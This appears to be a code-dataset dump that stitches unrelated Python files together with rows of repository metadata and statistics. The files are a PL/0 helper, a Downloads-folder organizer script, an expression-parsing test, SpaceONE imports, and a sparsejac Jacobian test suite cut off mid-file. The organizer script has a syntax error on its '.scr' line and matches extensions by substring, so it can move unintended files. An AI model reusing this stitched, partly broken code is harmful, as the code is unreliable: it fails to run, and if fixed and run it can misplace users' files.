] | 7 | 2017-11-10T14:49:57.000Z | 2021-07-20T12:34:32.000Z | while_stmt.py | duduscript/pl0 | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
] | null | null | null | while_stmt.py | duduscript/pl0 | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
] | 2 | 2018-11-20T23:50:38.000Z | 2021-11-14T19:23:57.000Z | def get_while_cond(ast):
return ast[1]
def get_while_stmt(ast):
return ast[2] | 17.2 | 24 | 0.697674 | 16 | 86 | 3.5 | 0.5625 | 0.214286 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.186047 | 86 | 5 | 25 | 17.2 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1f73aa1696d76310adf6cfed6403d4fc128d786b | 14,799 | py | Python | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | null | null | null | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | 1 | 2020-06-14T18:38:44.000Z | 2020-06-15T12:30:42.000Z | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | 1 | 2020-06-14T16:14:29.000Z | 2020-06-14T16:14:29.000Z | # [warning: do not run this script in the partiiton where system files are stored]
# use it with caution
import os
import shutil
path = '/home/hafeez/Downloads/'
names = os.listdir(path)
folder_name = ['Images', 'Audio', 'Videos', 'Documents', 'Softwares','System']
for x in range(0,6):
if not os.path.exists(path+folder_name[x]):
os.makedirs(path+folder_name[x])
for (main_dir,sub_dir,file_in_sub_dir) in os.walk(path):
print(main_dir)
for files in file_in_sub_dir:
#Images
if ".svg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpeg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".bmp" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".png" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".gif" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".tiff" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".psd" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".raw" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
#Audio / Music
if ".mp3" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".m4a" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".wav" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
# Video / Movies
if ".mp4" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mkv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".webm" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mp2" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpeg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpe" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".ogg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4v" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4p" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".avi" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".wmv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mov" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".qt" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".flv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".swf" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
# Documents
if ".pdf" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xps" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".doc" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".docx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".pptx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xlsx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xml" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
# Software / Comperessed Packages
if ".exe" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".deb" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zip" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.gz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.xz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.bz2" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".iso" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".apk" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".app" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".7z" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zipx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rpm" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".sitx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rar" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".pkg" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
# System files
if ".cdd" in files and not os.path.exists(path+'System/'+files): # Conserved Domain Database
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dll" in files and not os.path.exists(path+'System/'+files): # Dynamic Link Library
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dlc" in files and not os.path.exists(path+'System/'+files): # Dlc
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".bin" in files and not os.path.exists(path+'System/'+files): # Binary
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cab" in files and not os.path.exists(path+'System/'+files): # Windows Cabinet File
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".sh" in files and not os.path.exists(path+'System/'+files): # Shell Script
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cgz" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".crash" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cur" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".deskthemepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".dmp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".drv" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ds_store" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fir" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fpbf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fw" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hlp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hpj" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ico" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".idx" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".its" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".key" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".lnk" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log1" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".metadata_never_index" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mi4" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mum" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nrl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pbp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pdr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pk2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ppm_b" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".prefpane" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".rmt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ruf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".savedsearch" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".saver" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".scr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files
if ".sfcache" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".spi" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".swp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".sys" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".themepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
| 64.064935 | 101 | 0.602676 | 2,093 | 14,799 | 4.206402 | 0.080745 | 0.080304 | 0.102226 | 0.170377 | 0.905157 | 0.902999 | 0.902999 | 0.902999 | 0.902999 | 0.87642 | 0 | 0.001199 | 0.211163 | 14,799 | 230 | 102 | 64.343478 | 0.752955 | 0 | 0 | 0.478469 | 0 | 0 | 0.150575 | 0.003083 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009569 | null | null | 0.004785 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1f792c6dc9c0db4f0f22189362862d9a48bc705b | 671 | py | Python | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | 5 | 2019-10-14T01:06:57.000Z | 2021-02-02T16:33:06.000Z | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | null | null | null | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from gna.expression.preparse import *
s = 'echo ( alsdkfjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'ec|ho ( alsdkfjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdk|fjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf ( lsjd|flksjdf ) )'
print(s)
print(open_fcn(s))
s = 'e|cho ( al|sdkfjlskjdf ( lsjd|flksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf |( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf (| lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf ( lsjdflksjdf |) )'
print(s)
print(open_fcn(s))
| 18.135135 | 48 | 0.652757 | 95 | 671 | 4.526316 | 0.273684 | 0.111628 | 0.204651 | 0.27907 | 0.813953 | 0.813953 | 0.813953 | 0.813953 | 0.813953 | 0.716279 | 0 | 0 | 0.166915 | 671 | 36 | 49 | 18.638889 | 0.769231 | 0.029806 | 0 | 0.64 | 0 | 0 | 0.493846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.64 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
2f451b3be74fbe5f6b45d17d927def60d1c1c7c8 | 294 | py | Python | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 7 | 2020-06-04T23:01:12.000Z | 2021-01-31T08:41:29.000Z | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 2 | 2020-08-05T13:31:53.000Z | 2021-03-07T15:15:14.000Z | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 6 | 2020-06-10T01:59:35.000Z | 2021-11-25T06:30:35.000Z | from spaceone.secret.manager.secret_manager import SecretManager
from spaceone.secret.manager.secret_group_manager import SecretGroupManager
from spaceone.secret.manager.secret_connector_manager import SecretConnectorManager
from spaceone.secret.manager.identity_manager import IdentityManager
| 58.8 | 83 | 0.904762 | 34 | 294 | 7.647059 | 0.352941 | 0.25 | 0.276923 | 0.384615 | 0.357692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054422 | 294 | 4 | 84 | 73.5 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f6fa76bfef6702761ddc3ae1665e7f10d46b45f | 15,425 | py | Python | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | 3 | 2022-02-26T04:52:01.000Z | 2022-03-07T20:58:04.000Z | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | null | null | null | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | null | null | null | """Tests for `sparsejac`."""
import jax
import jax.experimental.sparse as jsparse
import jax.numpy as jnp
import networkx
import numpy as onp
import scipy.sparse as ssparse
import unittest
import sparsejac
# Length of the rank-1 test input vector used throughout the tests below.
_SIZE: int = 50
class JacrevTest(unittest.TestCase):
def test_sparsity_shape_validation(self):
    """Checks that a rank-3 `sparsity` argument is rejected."""
    identity_fn = lambda u: u
    with self.assertRaisesRegex(
            ValueError, '`sparsity` must be rank-2, but got shape'):
        rank3_sparsity = jsparse.BCOO.fromdense(jnp.ones((5, 5, 5)))
        sparsejac.jacrev(identity_fn, rank3_sparsity)
def test_sparsity_n_sparse_validation(self):
    """Checks that a BCOO sparsity with only one sparse dimension is rejected."""
    with self.assertRaisesRegex(
            ValueError, '`sparsity.n_sparse` must be 2, but got a value of'):
        values = jnp.ones((5, 5))
        coords = jnp.arange(5)[:, jnp.newaxis]
        # Rank-2 overall, but with one sparse and one dense dimension.
        bad_sparsity = jsparse.BCOO((values, coords), shape=(5, 5))
        assert bad_sparsity.ndim == 2
        assert bad_sparsity.n_sparse == 1
        sparsejac.jacrev(lambda u: u, bad_sparsity)
def test_input_shape_validation(self):
    """Checks that a non-rank-1 input to the Jacobian function is rejected."""
    pattern = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
    jac_fn = sparsejac.jacrev(lambda u: u, pattern)
    with self.assertRaisesRegex(
            ValueError, '`x` must be rank-1 with size matching'):
        jac_fn(jnp.ones((10, 5)))
def test_output_shape_validation(self):
    """Checks that a function whose output is not rank-1 is rejected."""
    sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
    invalid_fn = lambda x: jnp.reshape(x, (10, 5))
    jacfn = sparsejac.jacrev(invalid_fn, sparsity)
    # Use a raw string for the regex: '\(' in a plain string literal is an
    # invalid escape sequence (a SyntaxWarning on modern Python versions).
    with self.assertRaisesRegex(
            ValueError, r'`fn\(x\)` must be rank-1 with size matching'):
        jacfn(jnp.ones(_SIZE))
def test_argnums_validation(self):
with self.assertRaisesRegex(
ValueError, '`argnums` must be an integer, but got'):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
sparsejac.jacrev(lambda x: x, sparsity, argnums=(0, 1))
def test_diagonal(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_jit(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
jacfn = sparsejac.jacrev(fn, sparsity)
jacfn = jax.jit(jacfn)
actual = jacfn(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_shuffled(self):
fn = lambda x: jax.random.permutation(jax.random.PRNGKey(0), x**2)
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
expected = jax.jacrev(fn)(x)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_dense(self):
fn = lambda x: jnp.stack((jnp.sum(x), jnp.sum(x)**2, jnp.sum(x)**3))
sparsity = jsparse.BCOO.fromdense(jnp.ones((3, _SIZE)))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d_nonlinear(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')**2
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_2d(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_convolutional_2d_nonlinear(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()**2
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_argnums(self):
def fn(x, y, z):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
return y * convolved + z
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
y = jax.random.uniform(jax.random.PRNGKey(1), shape=(_SIZE,))
z = jax.random.uniform(jax.random.PRNGKey(2), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=0)(x, y, z)
expected = jax.jacrev(fn, argnums=0)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=1)(x, y, z)
expected = jax.jacrev(fn, argnums=1)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=2)(x, y, z)
expected = jax.jacrev(fn, argnums=2)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
def test_has_aux(self):
def fn(x):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
aux = x + 1
return convolved, aux
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
result_jac, result_aux = sparsejac.jacrev(fn, sparsity, has_aux=True)(x)
expected_jac, expected_aux = jax.jacrev(fn, has_aux=True)(x)
onp.testing.assert_array_equal(expected_jac, result_jac.todense())
onp.testing.assert_array_equal(expected_aux, result_aux)
class JacfwdTest(unittest.TestCase):
def test_sparsity_shape_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity` must be rank-2, but got shape'):
invalid_sparsity = jsparse.BCOO.fromdense(jnp.ones((5, 5, 5)))
sparsejac.jacfwd(lambda x: x, invalid_sparsity)
def test_sparsity_n_sparse_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity.n_sparse` must be 2, but got a value of'):
data = jnp.ones((5, 5))
indices = jnp.arange(5)[:, jnp.newaxis]
invalid_sparsity = jsparse.BCOO((data, indices), shape=(5, 5))
assert invalid_sparsity.ndim == 2
assert invalid_sparsity.n_sparse == 1
sparsejac.jacfwd(lambda x: x, invalid_sparsity)
def test_input_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
jacfn = sparsejac.jacfwd(lambda x: x, sparsity)
with self.assertRaisesRegex(
ValueError, '`x` must be rank-1 with size matching'):
jacfn(jnp.ones((10, 5)))
def test_output_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
invalid_fn = lambda x: jnp.reshape(x, (10, 5))
jacfn = sparsejac.jacfwd(invalid_fn, sparsity)
with self.assertRaisesRegex(
ValueError, 'Got an invalid compressed Jacobian shape, which can '):
jacfn(jnp.ones(_SIZE))
def test_argnums_validation(self):
with self.assertRaisesRegex(
ValueError, '`argnums` must be an integer, but got'):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
sparsejac.jacfwd(lambda x: x, sparsity, argnums=(0, 1))
def test_diagonal(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_jit(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
jacfn = sparsejac.jacfwd(fn, sparsity)
jacfn = jax.jit(jacfn)
actual = jacfn(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_shuffled(self):
fn = lambda x: jax.random.permutation(jax.random.PRNGKey(0), x**2)
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
expected = jax.jacrev(fn)(x)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_dense(self):
fn = lambda x: jnp.stack((jnp.sum(x), jnp.sum(x)**2, jnp.sum(x)**3))
sparsity = jsparse.BCOO.fromdense(jnp.ones((3, _SIZE)))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d(self):
